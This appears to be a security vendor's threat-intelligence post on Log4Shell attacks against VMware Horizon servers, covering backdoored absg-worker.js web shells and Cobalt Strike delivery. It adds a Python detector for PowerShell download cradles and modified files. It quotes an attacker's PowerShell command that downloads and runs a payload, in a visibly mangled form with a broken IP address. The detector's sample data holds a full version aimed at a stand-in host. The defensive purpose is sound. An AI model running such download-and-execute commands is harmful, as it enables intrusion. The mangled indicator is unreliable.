

On January 5, the UK’s National Health Service (NHS) alerted that hackers were actively targeting Log4Shell vulnerabilities in VMware Horizon servers in an effort to establish persistent access via web shells. These web shells allow unauthenticated attackers to remotely execute commands on your server as NT AUTHORITY\SYSTEM (root privileges).

According to Shodan, ~25,000 Horizon servers are currently internet accessible worldwide.

Based on Huntress’ dataset of 180 Horizon servers, we’ve validated NHS’ intel and discovered 10% of these systems (18) had been backdoored with a modified absg-worker.js web shell. Our team is continuing to track this activity and this post will be updated with new information as it becomes available.

It’s important to note that ~34% of the 180 Horizon servers (62) we analyzed were unpatched and internet-facing at the time of this publication. The web shells on these 18 compromised systems established a timeline that started in December and continued until December 29, 2021.

On January 14 at 1458 ET, an unrelated Managed Antivirus detection (Microsoft Defender) tipped our ThreatOps team to new exploitation of the Log4Shell vulnerability in VMware Horizon. This time it was used to deliver the Cobalt Strike implant. Additional security researchers including TheDFIRReport and Red Canary reported similar behavior around the same time, confirming a PowerShell-based downloader executed a Cobalt Strike payload that was configured to call back to 185.112.83116 for command and control:

Iex ((New-Object ).DownloadString('116:8080/drv'))

At 1938 ET, we started deploying Huntress’ soon-to-be-released Process Insights agent to all of the VMware Horizon servers we protect. This new EDR capability is based on an acquisition we made in early 2021 and allows us to proactively detect and respond to non-persistent malicious behavior by giving us the ability to collect detailed information about processes.
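Two checks a defender can run against the activity described above, as an added example that is not Huntress code or part of the original post: a process-creation triage that flags PowerShell command lines matching the IEX/DownloadString cradle pattern and extracts the host and port it reaches, and a hash comparison that tells whether a server's absg-worker.js still matches a clean copy. It assumes process events are available as dicts with 'image' and 'command_line' keys (for example exported from Sysmon Event ID 1 or EDR telemetry) and that a known-good SHA-256 of absg-worker.js can be taken from a clean install of the same Horizon build; the sample events, file contents and the 203.0.113.5 address are constructed stand-ins.

```python
"""Added example (not Huntress code). Assumptions: process-creation events
are dicts with 'image' and 'command_line' keys; a known-good SHA-256 of
absg-worker.js comes from a clean install of the same Horizon build. All
sample data below is constructed."""
import hashlib
import re
from typing import List, Optional

# The download cradle the post describes: IEX of a string fetched with
# DownloadString from an http(s) URL. Scheme, host and optional port are
# captured so an analyst can pivot on the callback address.
_CRADLE_RE = re.compile(
    r"(?i)\b(?:iex|invoke-expression)\b.*?\bdownloadstring\b.*?"
    r"(?P<scheme>https?)://(?P<host>[^'\"\s/:]+)(?::(?P<port>\d+))?"
)


def classify_command_line(cmdline: str) -> Optional[dict]:
    """Return {'host', 'port'} if cmdline is an IEX/DownloadString cradle, else None."""
    m = _CRADLE_RE.search(cmdline)
    if m is None:
        return None
    default_port = 443 if m.group("scheme").lower() == "https" else 80
    return {"host": m.group("host"), "port": int(m.group("port") or default_port)}


def find_cradles(events: List[dict]) -> List[dict]:
    """Flag PowerShell processes whose command line is a download cradle."""
    hits = []
    for ev in events:
        image = ev.get("image", "").lower()
        if not image.endswith(("powershell.exe", "pwsh.exe")):
            continue
        info = classify_command_line(ev.get("command_line", ""))
        if info is not None:
            hits.append({"pid": ev.get("pid"), **info})
    return hits


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def absg_worker_modified(content: bytes, known_good_sha256: str) -> bool:
    """True if the on-disk absg-worker.js no longer matches the clean build's hash."""
    return sha256_hex(content).lower() != known_good_sha256.lower()


# Constructed stand-ins: not real Horizon files and not real telemetry.
CLEAN_ABSG_WORKER = b"// absg-worker.js (clean stand-in)\nmodule.exports = {};\n"
# In practice take this hash from a clean install of the same Horizon build.
KNOWN_GOOD_SHA256 = sha256_hex(CLEAN_ABSG_WORKER)
TAMPERED_ABSG_WORKER = CLEAN_ABSG_WORKER + b"// extra code appended after install\n"

SAMPLE_EVENTS = [
    {"pid": 1001,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -Command Get-Service"},
    {"pid": 1002,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -c \"Iex ((New-Object Net.WebClient)"
                     ".DownloadString('http://203.0.113.5:8080/drv'))\""},
    {"pid": 1003,
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c echo DownloadString http://203.0.113.5:8080/x"},
]

if __name__ == "__main__":
    for hit in find_cradles(SAMPLE_EVENTS):
        print(f"pid {hit['pid']}: download cradle reaching {hit['host']}:{hit['port']}")
    print("absg-worker.js modified:",
          absg_worker_modified(TAMPERED_ABSG_WORKER, KNOWN_GOOD_SHA256))
```

The cradle check is deliberately narrow (PowerShell image plus IEX and DownloadString in one command line) so it can be run over bulk telemetry with few false positives; the hash check is only as good as the known-good baseline, so take it from install media or a freshly built server, not from another production host that may share the same modification.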
